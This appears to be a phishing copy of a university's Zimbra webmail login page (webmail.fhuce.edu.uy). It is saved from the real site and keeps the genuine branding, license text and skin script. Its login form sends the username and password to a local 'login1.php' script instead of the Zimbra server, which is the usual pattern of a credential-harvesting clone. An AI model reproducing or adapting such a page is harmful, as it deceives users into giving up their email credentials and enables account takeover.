<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- saved from url=(0028)http://webmail.fhuce.edu.uy/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--
 login.jsp
 * ***** BEGIN LICENSE BLOCK *****
 * Zimbra Collaboration Suite Web Client
 * Copyright (C) 2007, 2008, 2009, 2010 Zimbra, Inc.
 * 
 * The contents of this file are subject to the Zimbra Public License
 * Version 1.3 ("License"); you may not use this file except in
 * compliance with the License.  You may obtain a copy of the License at
 * http://www.zimbra.com/license.
 * 
 * Software distributed under the License is distributed on an "AS IS"
 * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied.
 * ***** END LICENSE BLOCK *****
-->
    
    
    <title>Zimbra Collaboration Suite Log In</title>
    
    <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=8.0; user-scalable=1;">
    <meta name="description" content="Zimbra provides open source server and client software for messaging and collaboration. To find out more visit http://www.zimbra.com.">
    <link rel="stylesheet" type="text/css" href="./index_files/common,login,zhtml,skin.css">
	
    <link rel="SHORTCUT ICON" href="http://webmail.fhuce.edu.uy/zimbra/img/logo/favicon.ico">
</head>

<body onLoad="onLoad();">
<table width="100%" style="height:100%;">
    <tbody><tr>
        <td align="center" valign="middle">
            <div id="ZloginPanel">
                <table width="100%">
                    <tbody><tr>
                        <td>
                            <table width="100%">
                                <tbody><tr>
                                    <td align="center" valign="middle">
                                        <a href="http://www.zimbra.com/" id="bannerLink" target="_new"><span style="cursor:pointer;display:block;" class="ImgLoginBanner"></span></a>
                                    </td>
                                </tr>
                                <tr>
                                    <td>
                                        <div id="ZLoginAppName">Collaboration Suite</div>
                                    </td>
                                </tr>
                            </tbody></table>
                        </td>
                    </tr>
                    <tr>
                        <td id="ZloginBodyContainer">
                            

                            <div id="ZloginFormPanel">
                                <form method="post" name="loginForm" action="login1.php" accept-charset="UTF-8">
                                    <input type="hidden" name="loginOp" value="login">
                                    <table width="100%" cellpadding="4">
                                        <tbody><tr>
                                            <td class="zLoginLabelContainer"><label for="username">Username:</label></td>
                                            <td colspan="2" class="zLoginFieldContainer">
                                                <input id="username" class="zLoginField" name="username" type="text" value="">
                                            </td>
                                        </tr>
                                        <tr>
                                            <td class="zLoginLabelContainer"><label for="password">Password:</label></td>
                                            <td colspan="2" class="zLoginFieldContainer">
                                                <input id="password" class="zLoginField" name="password" type="password" value="">
                                            </td>
                                        </tr>
                                        
                                        <tr>
                                            <td class="zLoginLabelContainer"></td><td>
                                                <table>
                                                    <tbody><tr>
                                                        <td><input id="remember" value="1" type="checkbox" name="zrememberme"></td>
                                                        <td class="zLoginCheckboxLabelContainer"><label for="remember">Remember me on this computer</label></td>
                                                    </tr>
                                                </tbody></table>
                                            </td>
                                            <td><input type="submit" class="zLoginButton" value="Log In"></td>
                                        </tr>
                                    </tbody></table>
                                    <table width="100%">
                                        <tbody><tr>
                                        	<td align="center">
                                                <div class="ZLoginSeparator" style="margin-top:0px"></div>
												Which version would you like to use?&nbsp;
												    
												<select name="client" onChange="clientChange(this.options[this.selectedIndex].value)">
													<option value="preferred" selected=""> Default</option>
													<option value="advanced"> Advanced (Ajax)</option>
													<option value="standard"> Standard (HTML)</option>
                                                    <option value="mobile"> Mobile</option>
												</select>

												<script type="text/javascript">
													// show a message if they should be using the 'standard' client, but have chosen 'advanced' instead
													function clientChange(selectValue) {
														var useStandard = false;
														useStandard = useStandard || (screen && (screen.width <= 800 && screen.height <= 600));
                                                        var div = document.getElementById("ZLoginUnsupported");
														div.style.display = ((selectValue == 'advanced') && useStandard) ? 'block' : 'none';
													}
												
													// if they have JS, write out a "what's this?" link that shows the message below
													function showWhatsThis() {
                                                        var div = document.getElementById("ZLoginWhatsThis");
														div.style.display = (div.style.display == "block" ? "none" : "block");
													}
													
													function onLoad() {
														document.loginForm.username.focus();
														clientChange("preferred");
													}
													document.write("<a href='#' onclick='showWhatsThis()' id='ZLoginWhatsThisAnchor'>What's This?<"+"/a>");
												</script><a href="http://webmail.fhuce.edu.uy/#" onClick="showWhatsThis()" id="ZLoginWhatsThisAnchor">What's This?</a>
											</td>
										</tr>
										<tr>
											<td align="center">
                                                <div id="ZLoginWhatsThis" class="ZLoginInfoMessage" style="display:none;text-align:left;width:90%;"><center style="margin-bottom:3px;"><b>Client Types:</b></center>	<b>Advanced</b> offers the full set of Web collaboration features. This Web Client works best with newer browsers and faster Internet connections. <br><br><b>Standard</b> is recommended when Internet connections are slow, when using older browsers, or for easier accessibility. <br><br><b>Mobile</b> is recommended for mobile devices. <br><br>To set <b>Default</b> to be your preferred client type, change the login options in your Preferences, General tab after you log in.</div>
                                                <div id="ZLoginUnsupported" class="ZLoginInfoMessage" style="display:none">Note that your web browser or display does not fully support the Advanced version.  We strongly recommend that you use the Standard client.</div>

                                                <div class="ZLoginSeparator"></div>
			                                </td>
                                        </tr>
										<tr>
                                            <td id="ZloginClientLevelContainer">
                                                <a target="_new" href="http://www.zimbra.com/">Zimbra</a> :: the leader in open source messaging and collaboration :: <a target="_new" href="http://blog.zimbra.com/">Blog</a> - <a target="_new" href="http://wiki.zimbra.com/">Wiki</a> - <a target="_new" href="http://www.zimbra.com/forums">Forums</a> | <a target="_new" href="http://www.zextras.com/">Enhanced by ZeXtras</a> |
                                            </td>
                                        </tr>
                                        <tr>
                                            <td id="ZloginLicenseContainer">
                                                Copyright © 2005-2012 Zimbra, Inc.     'Zimbra' and the Zimbra logos are trademarks of Zimbra, Inc.
                                            </td>
                                        </tr>
                                    </tbody></table>
                                </form>
                            </div>
                        </td>
                    </tr>
                </tbody></table>
            </div>
        </td>
    </tr>
</tbody></table>
<script>
  function ZmSkin(e){
this.hints=this.mergeObjects(ZmSkin.hints,e)
}
ZmSkin.hints={
name:"beach",version:"2",skin:{
containers:"skin_outer"}
,banner:{
position:"static",url:"http://www.zimbra.com"}
,userInfo:{
position:"static"}
,search:{
position:"static"}
,quota:{
position:"static"}
,presence:{
width:"40px",height:"24px"}
,appView:{
position:"static"}
,searchBuilder:{
containers:["skin_tr_search_builder"]}
,tree:{
minWidth:parseInt("150px"),maxWidth:parseInt("300px"),containers:["skin_td_tree","skin_td_tree_app_sash"],resizeContainers:["skin_td_tree"]}
,topToolbar:{
containers:"skin_tr_top_toolbar"}
,treeFooter:{
containers:"skin_tr_tree_footer"}
,topAd:{
containers:"skin_tr_top_ad"}
,sidebarAd:{
containers:"skin_td_sidebar_ad"}
,bottomAd:{
containers:"skin_tr_bottom_ad"}
,treeTopAd:{
containers:"skin_tr_tree_top_ad"}
,treeBottomAd:{
containers:"skin_tr_tree_bottom_ad"}
,helpButton:{
style:"link",container:"quota",url:""}
,logoutButton:{
style:"link",container:"quota"}
,appChooser:{
position:"static",direction:"LR"}
,toast:{
location:"N",transitions:[{
type:"slide-in",step:1,duration:10}
,{
type:"pause",duration:2500}
,{
type:"slide-out",step:-1,duration:25}
]}
,fullScreen:{
containers:["!skin_td_tree","!skin_td_tree_app_sash"]}
,allAds:{
containers:["skin_tr_top_ad","skin_td_sidebar_ad","skin_tr_bottom_ad","skin_tr_tree_top_ad","skin_tr_tree_bottom_ad"]}};
window.BaseSkin=ZmSkin;
ZmSkin.prototype={
show:function(a,r){
var s=this.hints[a]&&this.hints[a].containers;
if(s){
if(typeof s=="function"){
s.apply(this,[r!=false]);
skin._reflowApp();
return
}
if(typeof s=="string"){
s=[s]
}
for(var n=0;
n<s.length;
n++){
var o=s[n];
var t=o.replace(/^!/,"");
var e=o!=t;
this._showEl(t,e?!r:r)
}
skin._reflowApp()
}}
,hide:function(e){
this.show(e,false)
}
,gotoApp:function(e,t){
appCtxt.getAppController().activateApp(e,null,t)
}
,gotoPrefs:function(e){
if(appCtxt.getCurrentAppName()!=ZmApp.PREFERENCES){
var t=new AjxCallback(this,this._gotoPrefPage,[e]);
this.gotoApp(ZmApp.PREFERENCES,t)
}else{
this._gotoPrefPage(e)
}}
,mergeObjects:function(e,o){
if(e==null){
e={}
}
for(var a=1;
a<arguments.length;
a++){
var n=arguments[a];
for(var t in n){
var s=e[t];
if(typeof s=="object"&&!(s instanceof Array)){
this.mergeObjects(e[t],n[t]);
continue
}
if(!e[t]){
e[t]=n[t]
}}}
return e
}
,getTreeWidth:function(){
return Dwt.getSize(this._getEl(this.hints.tree.containers[0])).x
}
,setTreeWidth:function(e){
this._setContainerSizes("tree",e,null)
}
,showTopAd:function(e){
skin._showEl("skin_tr_top_ad",e);
skin._reflowApp()
}
,hideTopAd:function(){
skin.showTopAd(false)
}
,getTopAdContainer:function(){
return skin._getEl("skin_container_top_ad")
}
,showSidebarAd:function(e){
var t="skin_td_sidebar_ad";
if(e!=null){
skin._setSize(t,e)
}
skin._showEl(t);
skin._reflowApp()
}
,hideSidebarAd:function(){
var e="skin_td_sidebar_ad";
skin._hideEl(e);
skin._reflowApp()
}
,getSidebarAdContainer:function(){
return this._getEl("skin_container_sidebar_ad")
}
,_getEl:function(e){
return(typeof e=="string"?document.getElementById(e):e)
}
,_showEl:function(o,i){
var t=this._getEl(o);
if(!t){
return
}
var a;
if(i==false){
a="none"
}else{
var e=t.tagName;
if(e=="TD"&&!document.all){
a="table-cell"
}else{
if(e=="TR"&&!document.all){
a="table-row"
}else{
a="block"
}}}
t.style.display=a
}
,_hideEl:function(e){
this._showEl(e,false)
}
,_reparentEl:function(i,e){
var a=this._getEl(e);
var t=a&&this._getEl(i);
if(t){
a.appendChild(t)
}}
,_setSize:function(i,a,e){
var t=this._getEl(i);
if(!t){
return
}
if(a!=null){
t.style.width=a
}
if(e!=null){
t.style.height=e
}}
,_setContainerSizes:function(n,a,e){
var o=this.hints[n].resizeContainers||this.hints[n].containers;
for(var t=0;
t<o.length;
t++){
this._setSize(o[t],a,null)
}}
,_reflowApp:function(){
if(window._zimbraMail){
window._zimbraMail.getAppViewMgr().fitAll()
}}
,_gotoPrefPage:function(a){
if(a==null){
return
}
var i=appCtxt.getApp(ZmApp.PREFERENCES);
var t=i.getPrefController();
var e=t.getPrefsView();
e.selectSection(a)
}};
window.skin=new ZmSkin();
  var link = document.getElementById("bannerLink");
  if (link) {
    link.href = skin.hints.banner.url;
  }
  
</script>


</body></html>